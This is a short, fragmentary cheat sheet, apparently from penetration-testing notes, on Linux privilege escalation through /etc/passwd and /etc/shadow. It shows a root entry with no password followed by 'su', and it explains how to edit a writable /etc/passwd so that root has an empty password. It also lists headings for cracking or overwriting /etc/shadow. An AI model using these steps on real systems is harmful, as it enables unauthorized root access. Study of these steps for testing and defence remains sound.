/etc/passwd & /etc/shadow
/etc/passwd readible - root no password ?
$ head -n 1 /etc/passwd
root::0:0:root:/root:/bin/bash
$ su/etc/passwd writable
Change root line (remove x):
root:x:0:0:root:/root:/bin/bashroot::0:0:root:/root:/bin/bashCreate new user
/etc/shadow readible
CrackingUsers with no password
/etc/shadow writable
Last updated
